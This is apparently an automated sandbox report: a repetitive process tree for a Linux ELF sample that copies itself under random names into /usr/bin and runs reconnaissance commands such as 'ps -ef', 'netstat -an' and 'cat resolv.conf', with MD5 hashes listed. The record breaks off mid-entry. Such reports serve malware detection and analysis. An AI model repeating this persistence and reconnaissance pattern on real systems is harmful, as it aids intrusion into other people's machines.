General

Start time (UTC):	18:31:15
Start date (UTC):	26/10/2023
Path:	/usr/bin/lkzqkklpfr
Arguments:	-
File size:	625878 bytes
MD5 hash:	26d5465cc1a2caff5bb4ee89004cbcae

Chronological Activities

Analysis Process: 1.elf PID: 6335, Parent PID: 6205

General

Start time (UTC):	18:31:15
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6336, Parent PID: 6335

General

Start time (UTC):	18:31:15
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: lkzqkklpfr PID: 6336, Parent PID: 6335

General

Start time (UTC):	18:31:15
Start date (UTC):	26/10/2023
Path:	/usr/bin/lkzqkklpfr
Arguments:	/usr/bin/lkzqkklpfr who 6205
File size:	625878 bytes
MD5 hash:	26d5465cc1a2caff5bb4ee89004cbcae

Chronological Activities

Analysis Process: lkzqkklpfr PID: 6339, Parent PID: 6336

General

Start time (UTC):	18:31:15
Start date (UTC):	26/10/2023
Path:	/usr/bin/lkzqkklpfr
Arguments:	-
File size:	625878 bytes
MD5 hash:	26d5465cc1a2caff5bb4ee89004cbcae

Chronological Activities

Analysis Process: 1.elf PID: 6337, Parent PID: 6205

General

Start time (UTC):	18:31:15
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6338, Parent PID: 6337

General

Start time (UTC):	18:31:15
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: lkzqkklpfr PID: 6338, Parent PID: 6337

General

Start time (UTC):	18:31:15
Start date (UTC):	26/10/2023
Path:	/usr/bin/lkzqkklpfr
Arguments:	/usr/bin/lkzqkklpfr ifconfig 6205
File size:	625878 bytes
MD5 hash:	26d5465cc1a2caff5bb4ee89004cbcae

Chronological Activities

Analysis Process: lkzqkklpfr PID: 6342, Parent PID: 6338

General

Start time (UTC):	18:31:15
Start date (UTC):	26/10/2023
Path:	/usr/bin/lkzqkklpfr
Arguments:	-
File size:	625878 bytes
MD5 hash:	26d5465cc1a2caff5bb4ee89004cbcae

Chronological Activities

Analysis Process: 1.elf PID: 6340, Parent PID: 6205

General

Start time (UTC):	18:31:15
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6341, Parent PID: 6340

General

Start time (UTC):	18:31:15
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: lkzqkklpfr PID: 6341, Parent PID: 6340

General

Start time (UTC):	18:31:15
Start date (UTC):	26/10/2023
Path:	/usr/bin/lkzqkklpfr
Arguments:	/usr/bin/lkzqkklpfr "ls -la" 6205
File size:	625878 bytes
MD5 hash:	26d5465cc1a2caff5bb4ee89004cbcae

Chronological Activities

Analysis Process: lkzqkklpfr PID: 6343, Parent PID: 6341

General

Start time (UTC):	18:31:15
Start date (UTC):	26/10/2023
Path:	/usr/bin/lkzqkklpfr
Arguments:	-
File size:	625878 bytes
MD5 hash:	26d5465cc1a2caff5bb4ee89004cbcae

Chronological Activities

Analysis Process: 1.elf PID: 6346, Parent PID: 6205

General

Start time (UTC):	18:31:20
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6347, Parent PID: 6346

General

Start time (UTC):	18:31:20
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: cpbnjarskl PID: 6347, Parent PID: 6346

General

Start time (UTC):	18:31:20
Start date (UTC):	26/10/2023
Path:	/usr/bin/cpbnjarskl
Arguments:	/usr/bin/cpbnjarskl "ps -ef" 6205
File size:	625878 bytes
MD5 hash:	bdf7e50117e6bb11039b3f114d7da203

Chronological Activities

Analysis Process: cpbnjarskl PID: 6348, Parent PID: 6347

General

Start time (UTC):	18:31:20
Start date (UTC):	26/10/2023
Path:	/usr/bin/cpbnjarskl
Arguments:	-
File size:	625878 bytes
MD5 hash:	bdf7e50117e6bb11039b3f114d7da203

Chronological Activities

Analysis Process: 1.elf PID: 6349, Parent PID: 6205

General

Start time (UTC):	18:31:20
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6350, Parent PID: 6349

General

Start time (UTC):	18:31:20
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: cpbnjarskl PID: 6350, Parent PID: 6349

General

Start time (UTC):	18:31:20
Start date (UTC):	26/10/2023
Path:	/usr/bin/cpbnjarskl
Arguments:	/usr/bin/cpbnjarskl who 6205
File size:	625878 bytes
MD5 hash:	bdf7e50117e6bb11039b3f114d7da203

Chronological Activities

Analysis Process: cpbnjarskl PID: 6352, Parent PID: 6350

General

Start time (UTC):	18:31:20
Start date (UTC):	26/10/2023
Path:	/usr/bin/cpbnjarskl
Arguments:	-
File size:	625878 bytes
MD5 hash:	bdf7e50117e6bb11039b3f114d7da203

Chronological Activities

Analysis Process: 1.elf PID: 6351, Parent PID: 6205

General

Start time (UTC):	18:31:20
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6353, Parent PID: 6351

General

Start time (UTC):	18:31:20
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: cpbnjarskl PID: 6353, Parent PID: 6351

General

Start time (UTC):	18:31:20
Start date (UTC):	26/10/2023
Path:	/usr/bin/cpbnjarskl
Arguments:	/usr/bin/cpbnjarskl bash 6205
File size:	625878 bytes
MD5 hash:	bdf7e50117e6bb11039b3f114d7da203

Chronological Activities

Analysis Process: cpbnjarskl PID: 6356, Parent PID: 6353

General

Start time (UTC):	18:31:21
Start date (UTC):	26/10/2023
Path:	/usr/bin/cpbnjarskl
Arguments:	-
File size:	625878 bytes
MD5 hash:	bdf7e50117e6bb11039b3f114d7da203

Chronological Activities

Analysis Process: 1.elf PID: 6354, Parent PID: 6205

General

Start time (UTC):	18:31:21
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6355, Parent PID: 6354

General

Start time (UTC):	18:31:21
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: cpbnjarskl PID: 6355, Parent PID: 6354

General

Start time (UTC):	18:31:21
Start date (UTC):	26/10/2023
Path:	/usr/bin/cpbnjarskl
Arguments:	/usr/bin/cpbnjarskl ls 6205
File size:	625878 bytes
MD5 hash:	bdf7e50117e6bb11039b3f114d7da203

Chronological Activities

Analysis Process: cpbnjarskl PID: 6359, Parent PID: 6355

General

Start time (UTC):	18:31:21
Start date (UTC):	26/10/2023
Path:	/usr/bin/cpbnjarskl
Arguments:	-
File size:	625878 bytes
MD5 hash:	bdf7e50117e6bb11039b3f114d7da203

Chronological Activities

Analysis Process: 1.elf PID: 6357, Parent PID: 6205

General

Start time (UTC):	18:31:21
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6358, Parent PID: 6357

General

Start time (UTC):	18:31:21
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: cpbnjarskl PID: 6358, Parent PID: 6357

General

Start time (UTC):	18:31:21
Start date (UTC):	26/10/2023
Path:	/usr/bin/cpbnjarskl
Arguments:	/usr/bin/cpbnjarskl id 6205
File size:	625878 bytes
MD5 hash:	bdf7e50117e6bb11039b3f114d7da203

Chronological Activities

Analysis Process: cpbnjarskl PID: 6360, Parent PID: 6358

General

Start time (UTC):	18:31:21
Start date (UTC):	26/10/2023
Path:	/usr/bin/cpbnjarskl
Arguments:	-
File size:	625878 bytes
MD5 hash:	bdf7e50117e6bb11039b3f114d7da203

Chronological Activities

Analysis Process: 1.elf PID: 6363, Parent PID: 6205

General

Start time (UTC):	18:31:26
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6364, Parent PID: 6363

General

Start time (UTC):	18:31:26
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: uaewjndswe PID: 6364, Parent PID: 6363

General

Start time (UTC):	18:31:26
Start date (UTC):	26/10/2023
Path:	/usr/bin/uaewjndswe
Arguments:	/usr/bin/uaewjndswe "route -n" 6205
File size:	625878 bytes
MD5 hash:	042d91770189023b9e7a41c9db18e788

Chronological Activities

Analysis Process: uaewjndswe PID: 6365, Parent PID: 6364

General

Start time (UTC):	18:31:26
Start date (UTC):	26/10/2023
Path:	/usr/bin/uaewjndswe
Arguments:	-
File size:	625878 bytes
MD5 hash:	042d91770189023b9e7a41c9db18e788

Chronological Activities

Analysis Process: 1.elf PID: 6366, Parent PID: 6205

General

Start time (UTC):	18:31:26
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6367, Parent PID: 6366

General

Start time (UTC):	18:31:26
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: uaewjndswe PID: 6367, Parent PID: 6366

General

Start time (UTC):	18:31:26
Start date (UTC):	26/10/2023
Path:	/usr/bin/uaewjndswe
Arguments:	/usr/bin/uaewjndswe id 6205
File size:	625878 bytes
MD5 hash:	042d91770189023b9e7a41c9db18e788

Chronological Activities

Analysis Process: uaewjndswe PID: 6369, Parent PID: 6367

General

Start time (UTC):	18:31:27
Start date (UTC):	26/10/2023
Path:	/usr/bin/uaewjndswe
Arguments:	-
File size:	625878 bytes
MD5 hash:	042d91770189023b9e7a41c9db18e788

Chronological Activities

Analysis Process: 1.elf PID: 6368, Parent PID: 6205

General

Start time (UTC):	18:31:27
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6370, Parent PID: 6368

General

Start time (UTC):	18:31:27
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: uaewjndswe PID: 6370, Parent PID: 6368

General

Start time (UTC):	18:31:27
Start date (UTC):	26/10/2023
Path:	/usr/bin/uaewjndswe
Arguments:	/usr/bin/uaewjndswe ifconfig 6205
File size:	625878 bytes
MD5 hash:	042d91770189023b9e7a41c9db18e788

Chronological Activities

Analysis Process: uaewjndswe PID: 6373, Parent PID: 6370

General

Start time (UTC):	18:31:27
Start date (UTC):	26/10/2023
Path:	/usr/bin/uaewjndswe
Arguments:	-
File size:	625878 bytes
MD5 hash:	042d91770189023b9e7a41c9db18e788

Chronological Activities

Analysis Process: 1.elf PID: 6371, Parent PID: 6205

General

Start time (UTC):	18:31:27
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6372, Parent PID: 6371

General

Start time (UTC):	18:31:27
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: uaewjndswe PID: 6372, Parent PID: 6371

General

Start time (UTC):	18:31:27
Start date (UTC):	26/10/2023
Path:	/usr/bin/uaewjndswe
Arguments:	/usr/bin/uaewjndswe "cd /etc" 6205
File size:	625878 bytes
MD5 hash:	042d91770189023b9e7a41c9db18e788

Chronological Activities

Analysis Process: uaewjndswe PID: 6376, Parent PID: 6372

General

Start time (UTC):	18:31:27
Start date (UTC):	26/10/2023
Path:	/usr/bin/uaewjndswe
Arguments:	-
File size:	625878 bytes
MD5 hash:	042d91770189023b9e7a41c9db18e788

Chronological Activities

Analysis Process: 1.elf PID: 6374, Parent PID: 6205

General

Start time (UTC):	18:31:27
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6375, Parent PID: 6374

General

Start time (UTC):	18:31:27
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: uaewjndswe PID: 6375, Parent PID: 6374

General

Start time (UTC):	18:31:27
Start date (UTC):	26/10/2023
Path:	/usr/bin/uaewjndswe
Arguments:	/usr/bin/uaewjndswe uptime 6205
File size:	625878 bytes
MD5 hash:	042d91770189023b9e7a41c9db18e788

Chronological Activities

Analysis Process: uaewjndswe PID: 6377, Parent PID: 6375

General

Start time (UTC):	18:31:27
Start date (UTC):	26/10/2023
Path:	/usr/bin/uaewjndswe
Arguments:	-
File size:	625878 bytes
MD5 hash:	042d91770189023b9e7a41c9db18e788

Chronological Activities

Analysis Process: 1.elf PID: 6382, Parent PID: 6205

General

Start time (UTC):	18:31:32
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6383, Parent PID: 6382

General

Start time (UTC):	18:31:32
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: efgdvbpuxx PID: 6383, Parent PID: 6382

General

Start time (UTC):	18:31:32
Start date (UTC):	26/10/2023
Path:	/usr/bin/efgdvbpuxx
Arguments:	/usr/bin/efgdvbpuxx "cat resolv.conf" 6205
File size:	625878 bytes
MD5 hash:	5adf54da233ddd71999a30ae5852d13e

Chronological Activities

Analysis Process: efgdvbpuxx PID: 6384, Parent PID: 6383

General

Start time (UTC):	18:31:32
Start date (UTC):	26/10/2023
Path:	/usr/bin/efgdvbpuxx
Arguments:	-
File size:	625878 bytes
MD5 hash:	5adf54da233ddd71999a30ae5852d13e

Chronological Activities

Analysis Process: 1.elf PID: 6385, Parent PID: 6205

General

Start time (UTC):	18:31:32
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6386, Parent PID: 6385

General

Start time (UTC):	18:31:32
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: efgdvbpuxx PID: 6386, Parent PID: 6385

General

Start time (UTC):	18:31:32
Start date (UTC):	26/10/2023
Path:	/usr/bin/efgdvbpuxx
Arguments:	/usr/bin/efgdvbpuxx pwd 6205
File size:	625878 bytes
MD5 hash:	5adf54da233ddd71999a30ae5852d13e

Chronological Activities

Analysis Process: efgdvbpuxx PID: 6387, Parent PID: 6386

General

Start time (UTC):	18:31:32
Start date (UTC):	26/10/2023
Path:	/usr/bin/efgdvbpuxx
Arguments:	-
File size:	625878 bytes
MD5 hash:	5adf54da233ddd71999a30ae5852d13e

Chronological Activities

Analysis Process: 1.elf PID: 6388, Parent PID: 6205

General

Start time (UTC):	18:31:32
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6389, Parent PID: 6388

General

Start time (UTC):	18:31:32
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: efgdvbpuxx PID: 6389, Parent PID: 6388

General

Start time (UTC):	18:31:32
Start date (UTC):	26/10/2023
Path:	/usr/bin/efgdvbpuxx
Arguments:	/usr/bin/efgdvbpuxx "ps -ef" 6205
File size:	625878 bytes
MD5 hash:	5adf54da233ddd71999a30ae5852d13e

Chronological Activities

Analysis Process: efgdvbpuxx PID: 6392, Parent PID: 6389

General

Start time (UTC):	18:31:33
Start date (UTC):	26/10/2023
Path:	/usr/bin/efgdvbpuxx
Arguments:	-
File size:	625878 bytes
MD5 hash:	5adf54da233ddd71999a30ae5852d13e

Chronological Activities

Analysis Process: 1.elf PID: 6390, Parent PID: 6205

General

Start time (UTC):	18:31:33
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6391, Parent PID: 6390

General

Start time (UTC):	18:31:33
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: efgdvbpuxx PID: 6391, Parent PID: 6390

General

Start time (UTC):	18:31:33
Start date (UTC):	26/10/2023
Path:	/usr/bin/efgdvbpuxx
Arguments:	/usr/bin/efgdvbpuxx top 6205
File size:	625878 bytes
MD5 hash:	5adf54da233ddd71999a30ae5852d13e

Chronological Activities

Analysis Process: efgdvbpuxx PID: 6395, Parent PID: 6391

General

Start time (UTC):	18:31:33
Start date (UTC):	26/10/2023
Path:	/usr/bin/efgdvbpuxx
Arguments:	-
File size:	625878 bytes
MD5 hash:	5adf54da233ddd71999a30ae5852d13e

Chronological Activities

Analysis Process: 1.elf PID: 6393, Parent PID: 6205

General

Start time (UTC):	18:31:33
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6394, Parent PID: 6393

General

Start time (UTC):	18:31:33
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: efgdvbpuxx PID: 6394, Parent PID: 6393

General

Start time (UTC):	18:31:33
Start date (UTC):	26/10/2023
Path:	/usr/bin/efgdvbpuxx
Arguments:	/usr/bin/efgdvbpuxx whoami 6205
File size:	625878 bytes
MD5 hash:	5adf54da233ddd71999a30ae5852d13e

Chronological Activities

Analysis Process: efgdvbpuxx PID: 6396, Parent PID: 6394

General

Start time (UTC):	18:31:33
Start date (UTC):	26/10/2023
Path:	/usr/bin/efgdvbpuxx
Arguments:	-
File size:	625878 bytes
MD5 hash:	5adf54da233ddd71999a30ae5852d13e

Chronological Activities

Analysis Process: 1.elf PID: 6402, Parent PID: 6205

General

Start time (UTC):	18:31:38
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6403, Parent PID: 6402

General

Start time (UTC):	18:31:38
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: nxattrsdxm PID: 6403, Parent PID: 6402

General

Start time (UTC):	18:31:38
Start date (UTC):	26/10/2023
Path:	/usr/bin/nxattrsdxm
Arguments:	/usr/bin/nxattrsdxm pwd 6205
File size:	625878 bytes
MD5 hash:	25b1b59dad8e150a80d50015eb75bd53

Chronological Activities

Analysis Process: nxattrsdxm PID: 6404, Parent PID: 6403

General

Start time (UTC):	18:31:38
Start date (UTC):	26/10/2023
Path:	/usr/bin/nxattrsdxm
Arguments:	-
File size:	625878 bytes
MD5 hash:	25b1b59dad8e150a80d50015eb75bd53

Chronological Activities

Analysis Process: 1.elf PID: 6405, Parent PID: 6205

General

Start time (UTC):	18:31:38
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6406, Parent PID: 6405

General

Start time (UTC):	18:31:38
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: nxattrsdxm PID: 6406, Parent PID: 6405

General

Start time (UTC):	18:31:38
Start date (UTC):	26/10/2023
Path:	/usr/bin/nxattrsdxm
Arguments:	/usr/bin/nxattrsdxm "netstat -an" 6205
File size:	625878 bytes
MD5 hash:	25b1b59dad8e150a80d50015eb75bd53

Chronological Activities

Analysis Process: nxattrsdxm PID: 6407, Parent PID: 6406

General

Start time (UTC):	18:31:38
Start date (UTC):	26/10/2023
Path:	/usr/bin/nxattrsdxm
Arguments:	-
File size:	625878 bytes
MD5 hash:	25b1b59dad8e150a80d50015eb75bd53

Chronological Activities

Analysis Process: 1.elf PID: 6408, Parent PID: 6205

General

Start time (UTC):	18:31:38
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6409, Parent PID: 6408

General

Start time (UTC):	18:31:38
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: nxattrsdxm PID: 6409, Parent PID: 6408

General

Start time (UTC):	18:31:38
Start date (UTC):	26/10/2023
Path:	/usr/bin/nxattrsdxm
Arguments:	/usr/bin/nxattrsdxm ls 6205
File size:	625878 bytes
MD5 hash:	25b1b59dad8e150a80d50015eb75bd53

Chronological Activities

Analysis Process: nxattrsdxm PID: 6410, Parent PID: 6409

General

Start time (UTC):	18:31:38
Start date (UTC):	26/10/2023
Path:	/usr/bin/nxattrsdxm
Arguments:	-
File size:	625878 bytes
MD5 hash:	25b1b59dad8e150a80d50015eb75bd53

Chronological Activities

Analysis Process: 1.elf PID: 6411, Parent PID: 6205

General

Start time (UTC):	18:31:38
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6412, Parent PID: 6411

General

Start time (UTC):	18:31:38
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: nxattrsdxm PID: 6412, Parent PID: 6411

General

Start time (UTC):	18:31:38
Start date (UTC):	26/10/2023
Path:	/usr/bin/nxattrsdxm
Arguments:	/usr/bin/nxattrsdxm "netstat -an" 6205
File size:	625878 bytes
MD5 hash:	25b1b59dad8e150a80d50015eb75bd53

Chronological Activities

Analysis Process: nxattrsdxm PID: 6413, Parent PID: 6412

General

Start time (UTC):	18:31:38
Start date (UTC):	26/10/2023
Path:	/usr/bin/nxattrsdxm
Arguments:	-
File size:	625878 bytes
MD5 hash:	25b1b59dad8e150a80d50015eb75bd53

Chronological Activities

Analysis Process: 1.elf PID: 6414, Parent PID: 6205

General

Start time (UTC):	18:31:38
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6415, Parent PID: 6414

General

Start time (UTC):	18:31:38
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: nxattrsdxm PID: 6415, Parent PID: 6414

General

Start time (UTC):	18:31:38
Start date (UTC):	26/10/2023
Path:	/usr/bin/nxattrsdxm
Arguments:	/usr/bin/nxattrsdxm "cd /etc" 6205
File size:	625878 bytes
MD5 hash:	25b1b59dad8e150a80d50015eb75bd53

Chronological Activities

Analysis Process: nxattrsdxm PID: 6416, Parent PID: 6415

General

Start time (UTC):	18:31:38
Start date (UTC):	26/10/2023
Path:	/usr/bin/nxattrsdxm
Arguments:	-
File size:	625878 bytes
MD5 hash:	25b1b59dad8e150a80d50015eb75bd53

Chronological Activities

Analysis Process: 1.elf PID: 6419, Parent PID: 6205

General

Start time (UTC):	18:31:44
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6420, Parent PID: 6419

General

Start time (UTC):	18:31:44
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: bjhrrojebv PID: 6420, Parent PID: 6419

General

Start time (UTC):	18:31:44
Start date (UTC):	26/10/2023
Path:	/usr/bin/bjhrrojebv
Arguments:	/usr/bin/bjhrrojebv who 6205
File size:	625878 bytes
MD5 hash:	305f5484460feb573c4a06d56e6ac96a

Chronological Activities

Analysis Process: bjhrrojebv PID: 6421, Parent PID: 6420

General

Start time (UTC):	18:31:44
Start date (UTC):	26/10/2023
Path:	/usr/bin/bjhrrojebv
Arguments:	-
File size:	625878 bytes
MD5 hash:	305f5484460feb573c4a06d56e6ac96a

Chronological Activities

Analysis Process: 1.elf PID: 6422, Parent PID: 6205

General

Start time (UTC):	18:31:44
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6423, Parent PID: 6422

General

Start time (UTC):	18:31:44
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: bjhrrojebv PID: 6423, Parent PID: 6422

General

Start time (UTC):	18:31:44
Start date (UTC):	26/10/2023
Path:	/usr/bin/bjhrrojebv
Arguments:	/usr/bin/bjhrrojebv uptime 6205
File size:	625878 bytes
MD5 hash:	305f5484460feb573c4a06d56e6ac96a

Chronological Activities

Analysis Process: bjhrrojebv PID: 6426, Parent PID: 6423

General

Start time (UTC):	18:31:44
Start date (UTC):	26/10/2023
Path:	/usr/bin/bjhrrojebv
Arguments:	-
File size:	625878 bytes
MD5 hash:	305f5484460feb573c4a06d56e6ac96a

Chronological Activities

Analysis Process: 1.elf PID: 6424, Parent PID: 6205

General

Start time (UTC):	18:31:44
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6425, Parent PID: 6424

General

Start time (UTC):	18:31:44
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: bjhrrojebv PID: 6425, Parent PID: 6424

General

Start time (UTC):	18:31:44
Start date (UTC):	26/10/2023
Path:	/usr/bin/bjhrrojebv
Arguments:	/usr/bin/bjhrrojebv "ls -la" 6205
File size:	625878 bytes
MD5 hash:	305f5484460feb573c4a06d56e6ac96a

Chronological Activities

Analysis Process: bjhrrojebv PID: 6429, Parent PID: 6425

General

